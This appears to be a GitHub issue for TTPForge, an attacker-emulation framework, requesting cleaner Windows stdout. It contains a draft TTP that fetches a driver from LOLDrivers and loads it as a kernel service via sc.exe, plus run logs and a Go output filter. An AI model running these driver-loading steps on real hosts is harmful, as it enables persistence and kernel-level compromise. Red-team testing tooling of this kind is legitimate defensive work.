facebookincubator / TTPForge

The TTPForge is a Cybersecurity Framework for developing, automating, and executing attacker Tactics, Techniques, and Procedures (TTPs).
MIT License

💡 [REQUEST] - [Windows] Remove shell commands from standard out #479

Closed godlovepenn closed 4 months ago

godlovepenn commented 10 months ago

Implementation PR

No response

Reference Issues

No response

Summary

Remove executed commands on Windows from standard out.

Basic Example

Example Draft TTP

Using LolDrivers
---
name: Loading Kernel Driver with sc.exe
description: |
  Download and load kernel driver with sc.exe. 
requirements: 
  platforms:
    - os: windows
mitre: 
  tactics:
    - TA0003
  techniques:
    - T1543
  subtechniques:
    - "T1543.003 Create or Modify System Process: Windows Service"
args:
  - name: service_name
    default: drive.bin 
  - name: file_hash
    default: 1f01257d9730f805b2a1d69099ef891d
steps:
  - name: get-driver-from-loldrivers
    fetch_uri: https://github.com/magicsword-io/LOLDrivers/raw/main/drivers/{{.Args.file_hash}}.bin
    overwrite: true
    location: bin\{{.Args.file_hash}}.bin
    cleanup:
      executor: powershell
      description: |
        1. Deleting driver service if found. 
        2. Removing downloaded driver from disk. 
      inline: | 
        $drivePath = Join-Path $PWD.Path "\bin\{{.Args.file_hash}}.bin"
        if (Get-Service -Name {{.Args.file_hash}} -ErrorAction SilentlyContinue) { sc.exe delete {{.Args.file_hash}} }
        Remove-Item $drivePath
        Write-Host "Driver removed from disk!"  
  - name: load-driver
    executor: powershell
    inline: |
      # pwd
      $drivePath = Join-Path $PWD.Path "\bin\{{.Args.file_hash}}.bin"
      # echo $drivePath
      if (-not (Get-Service -Name {{.Args.file_hash}} -ErrorAction SilentlyContinue)) { sc.exe create {{.Args.file_hash}} binPath= $drivePath type=kernel}
      sc.exe start {{.Args.file_hash}}
    cleanup: 
      executor: powershell
      description: |
        1. Stopping driver service from running.     
        2. Deleting driver service. 
        3. Removing downloaded driver from disk. 
      inline: | 
        $drivePath = Join-Path $PWD.Path "\bin\{{.Args.file_hash}}.bin"
        sc.exe stop {{.Args.file_hash}}
        Write-Host "Service stopped!"
        sc.exe delete {{.Args.file_hash}}
        Write-Host "Service deleted!"
        Remove-Item $drivePath
        Write-Host "Driver removed from disk!"
---

Execution command:

.\ttpforge.exe -c .\windowsttps\ttpforge-repo-config.yaml run .\windowsttps\ttps\T1543.003\ttplol.yml

Sample output

PS C:\Users\WDAGUtilityAccount> .\ttpforge.exe -c .\windowsttps\ttpforge-repo-config.yaml run .\windowsttps\ttps\T1543.003\ttplol.yml
INFO    [*] Validating TTP
INFO    [+] Finished validating steps
INFO    RUNNING TTP: Loading Kernel Driver with sc.exe
INFO    Executing Step #1: get-driver-from-loldrivers
INFO    ========= Executing ==========
INFO    ========= Result ==========
INFO    Executing Step #2: load-driver
INFO    [STDOUT] Windows PowerShell
INFO    [STDOUT] Copyright (C) Microsoft Corporation. All rights reserved.
INFO    [STDOUT]
INFO    [STDOUT] Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
INFO    [STDOUT]
INFO    [STDOUT]
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] #
INFO    [STDOUT]  pwd
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] $
INFO    [STDOUT] drivePath = Join-Path $PWD.Path "\bin\1f01257d9730f805b2a1d69099ef891d.bin"
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] #
INFO    [STDOUT]  echo $drivePath
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] i
INFO    [STDOUT] f (-not (Get-Service -Name 1f01257d9730f805b2a1d69099ef891d -ErrorAction SilentlyContinue)) { sc.exe create 1f01257d9730f805b2a1d69099ef891d binPath= $drivePath type=kernel}
INFO    [STDOUT] [SC] CreateService SUCCESS
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
INFO    [STDOUT] s
INFO    [STDOUT] c.exe start 1f01257d9730f805b2a1d69099ef891d
INFO    [STDOUT] [SC] StartService FAILED 1275:
INFO    [STDOUT]
INFO    [STDOUT] This driver has been blocked from loading
INFO    [STDOUT]
INFO    [STDOUT] PS C:\Users\WDAGUtilityAccount\windowsttps\ttps\T1543.003>
ERROR   [*] Error executing TTP: exit status 1
INFO    [*] Beginning Cleanup

Preferred Output

PS C:\Users\WDAGUtilityAccount> .\ttpforge.exe -c .\windowsttps\ttpforge-repo-config.yaml run .\windowsttps\ttps\T1543.003\ttplol.yml
INFO    [*] Validating TTP
INFO    [+] Finished validating steps
INFO    RUNNING TTP: Loading Kernel Driver with sc.exe
INFO    Executing Step #1: get-driver-from-loldrivers
INFO    ========= Executing ==========
INFO    ========= Result ==========
INFO    Executing Step #2: load-driver
INFO    [STDOUT] [SC] CreateService SUCCESS
INFO    [STDOUT] [SC] StartService FAILED 1275:
INFO    [STDOUT] This driver has been blocked from loading
ERROR   [*] Error executing TTP: exit status 1
INFO    [*] Beginning Cleanup

Drawbacks

Unresolved questions

No response
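One way to get from the sample output to the preferred output without changing how the step is executed, added here as an example rather than TTPForge's own code: a Go filter that drops the PowerShell logo, the interactive prompts and the echoed statements that the console host prints when the inline block is piped into powershell.exe over stdin. It assumes the executor still has the rendered script text; the transcript and the service name drv are constructed to mirror the issue's sample.

```go
package main
import (
	"regexp"
	"strings"
)
// Prompt printed by the console host when a script is piped into powershell.exe's stdin.
var promptRE = regexp.MustCompile(`^PS .*>\s*$`)
// Logo lines printed when the host is started without -NoLogo.
var bannerPrefixes = []string{"Windows PowerShell", "Copyright (C) Microsoft", "Install the latest PowerShell"}

// StripInteractiveEcho drops prompts, the logo, blank lines and echoed statements from captured
// stdout, keeping only real command output. script is the rendered inline block, one statement per line.
func StripInteractiveEcho(captured []string, script string) []string {
	stmts := map[string]bool{}
	for _, s := range strings.Split(script, "\n") {
		stmts[strings.TrimSpace(s)] = true
	}
	delete(stmts, "")
	out := []string{}
	for i := 0; i < len(captured); i++ {
		line := strings.TrimSpace(captured[i])
		if line == "" {
			continue
		}
		if promptRE.MatchString(line) {
			// The host echoes each statement after the prompt, usually split as its
			// first character on one line and the remainder on the next.
			if i+1 < len(captured) && stmts[strings.TrimSpace(captured[i+1])] {
				i++
			} else if i+2 < len(captured) && stmts[strings.TrimSpace(captured[i+1]+captured[i+2])] {
				i += 2
			}
			continue
		}
		isBanner := false
		for _, p := range bannerPrefixes {
			isBanner = isBanner || strings.HasPrefix(line, p)
		}
		if !isBanner {
			out = append(out, captured[i])
		}
	}
	return out
}
// Constructed sample mirroring the transcript in the issue ("drv" is a placeholder service name).
var sampleScript = "# pwd\n$drivePath = Join-Path $PWD.Path \"\\bin\\drv.bin\"\nsc.exe start drv\n"
var sampleCapture = []string{
	"Windows PowerShell", "Copyright (C) Microsoft Corporation. All rights reserved.", "", "PS C:\\work>", "#", " pwd",
	"PS C:\\work>", "$", "drivePath = Join-Path $PWD.Path \"\\bin\\drv.bin\"", "PS C:\\work>", "s", "c.exe start drv",
	"[SC] StartService FAILED 1275:", "", "This driver has been blocked from loading", "", "PS C:\\work>",
}
```

Starting the host with -NoLogo suppresses the banner and running the block via -File avoids the prompt echo at the source; the filter covers output captured the current way.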